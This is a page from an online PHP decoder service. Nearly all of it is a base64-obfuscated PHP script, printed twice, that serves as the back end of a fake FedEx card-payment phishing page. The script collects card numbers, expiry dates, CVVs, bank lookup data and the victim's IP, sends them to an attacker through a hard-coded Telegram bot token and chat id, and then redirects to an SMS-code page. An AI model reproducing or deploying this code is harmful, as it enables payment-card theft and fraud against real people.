Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(0);session_start();$s0=str_replace(base64_decode('IA=='),'',$_POST[b..
Decoded Output download
<?php error_reporting(0);session_start();$s0=str_replace(base64_decode('IA=='),'',$_POST[base64_decode('Y2FyZF9udW1iZXI=')]);$_SESSION[base64_decode('dmNu')]=$s0;$l1=json_decode(file_get_contents(base64_decode('aHR0cHM6Ly9sb29rdXAuYmlubGlzdC5uZXQv').substr($s0,0,7)));$r2=getenv(base64_decode('UkVNT1RFX0FERFI='));$f3=@json_decode(file_get_contents(base64_decode('aHR0cDovL3d3dy5nZW9wbHVnaW4ubmV0L2pzb24uZ3A/aXA9').$r2));if($f3&&$f3->$w4!=null){$l5=$f3->$b6;}$w7=$l1->$z8->$v9;$da=$l1->$cb->$uc;$hd=$l1->$z8->$xe;$df=$l1->$k10;$x11=$l1->$j12;$e13.=base64_decode('IEZFREVYIFJFQ29kZWQgQ0FSRCAgVjE=');$e13.=base64_decode('Cg==');$e13.=base64_decode('Cg==');$e13.=base64_decode('Cg==');$e13.=base64_decode('Q2FyZCAgICA6IA==').$s0.base64_decode('Cg==');$e13.=base64_decode('TU0vWVlZWSAgICA6IA==').$_POST[base64_decode('ZXhwaXJ5')].base64_decode('Cg==');$e13.=base64_decode('Q1ZWICAgICAgICAgOiA=').$_POST[base64_decode('Y3Z2')].base64_decode('Cg==');$e13.=base64_decode('Cg==');$e13.=base64_decode('QkFOSyAgICAgICAgIDog').$w7.base64_decode('Cg==');$e13.=base64_decode('Q291bnRyeSBCYW5rICAgICAgICA6IA==').$da.base64_decode('Cg==');$e13.=base64_decode('c2NoZW1lICAgICAgICAgOiA=').$df.base64_decode('Cg==');$e13.=base64_decode('YnJhbmQgICAgICAgICA6IA==').$x11.base64_decode('Cg==');$e13.=base64_decode('Cg==');$e13.=base64_decode('SVAgICAgICAgICA6IA==').$r2.base64_decode('Cg==');$f14=base64_decode('MjEwNDczMTEwMzpBQUYzWFNhaEY4RVNoNlJXV0p0VFZkdW5CN21kSGcwQ1BWZw==');$f15=array(base64_decode('Y2hhdF9pZA==')=>base64_decode('MTYzNDI3MTMyMg=='),base64_decode('dGV4dA==')=>$e13,);$w16=base64_decode('aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdA==').$f14.base64_decode('L3NlbmRNZXNzYWdl');$j17=curl_init($w16);curl_setopt($j17,CURLOPT_POST,1);curl_setopt($j17,CURLOPT_POSTFIELDS,$f15);curl_setopt($j17,CURLOPT_RETURNTRANSFER,true);$h18=curl_exec($j17);if(curl_errno($j17)){echo base64_decode('Q3VybCBlcnJvcjog').curl_error($j17);}curl_close($j17);header(base64_decode('TG9jYXRpb246IC4uL2xvYWRpbmctc21zLnBocA=='));?>Did this file decode correctly?
Original Code
<?php error_reporting(0);session_start();$s0=str_replace(base64_decode('IA=='),'',$_POST[base64_decode('Y2FyZF9udW1iZXI=')]);$_SESSION[base64_decode('dmNu')]=$s0;$l1=json_decode(file_get_contents(base64_decode('aHR0cHM6Ly9sb29rdXAuYmlubGlzdC5uZXQv').substr($s0,0,7)));$r2=getenv(base64_decode('UkVNT1RFX0FERFI='));$f3=@json_decode(file_get_contents(base64_decode('aHR0cDovL3d3dy5nZW9wbHVnaW4ubmV0L2pzb24uZ3A/aXA9').$r2));if($f3&&$f3->$w4!=null){$l5=$f3->$b6;}$w7=$l1->$z8->$v9;$da=$l1->$cb->$uc;$hd=$l1->$z8->$xe;$df=$l1->$k10;$x11=$l1->$j12;$e13.=base64_decode('IEZFREVYIFJFQ29kZWQgQ0FSRCAgVjE=');$e13.=base64_decode('Cg==');$e13.=base64_decode('Cg==');$e13.=base64_decode('Cg==');$e13.=base64_decode('Q2FyZCAgICA6IA==').$s0.base64_decode('Cg==');$e13.=base64_decode('TU0vWVlZWSAgICA6IA==').$_POST[base64_decode('ZXhwaXJ5')].base64_decode('Cg==');$e13.=base64_decode('Q1ZWICAgICAgICAgOiA=').$_POST[base64_decode('Y3Z2')].base64_decode('Cg==');$e13.=base64_decode('Cg==');$e13.=base64_decode('QkFOSyAgICAgICAgIDog').$w7.base64_decode('Cg==');$e13.=base64_decode('Q291bnRyeSBCYW5rICAgICAgICA6IA==').$da.base64_decode('Cg==');$e13.=base64_decode('c2NoZW1lICAgICAgICAgOiA=').$df.base64_decode('Cg==');$e13.=base64_decode('YnJhbmQgICAgICAgICA6IA==').$x11.base64_decode('Cg==');$e13.=base64_decode('Cg==');$e13.=base64_decode('SVAgICAgICAgICA6IA==').$r2.base64_decode('Cg==');$f14=base64_decode('MjEwNDczMTEwMzpBQUYzWFNhaEY4RVNoNlJXV0p0VFZkdW5CN21kSGcwQ1BWZw==');$f15=array(base64_decode('Y2hhdF9pZA==')=>base64_decode('MTYzNDI3MTMyMg=='),base64_decode('dGV4dA==')=>$e13,);$w16=base64_decode('aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdA==').$f14.base64_decode('L3NlbmRNZXNzYWdl');$j17=curl_init($w16);curl_setopt($j17,CURLOPT_POST,1);curl_setopt($j17,CURLOPT_POSTFIELDS,$f15);curl_setopt($j17,CURLOPT_RETURNTRANSFER,true);$h18=curl_exec($j17);if(curl_errno($j17)){echo base64_decode('Q3VybCBlcnJvcjog').curl_error($j17);}curl_close($j17);header(base64_decode('TG9jYXRpb246IC4uL2xvYWRpbmctc21zLnBocA=='));?>Function Calls
| str_replace | 1 |
| base64_decode | 2 |
| session_start | 1 |
| error_reporting | 1 |
Stats
| MD5 | e126fd15662af14ed149b803b16cdfc5 |
| Eval Count | 0 |
| Decode Time | 293 ms |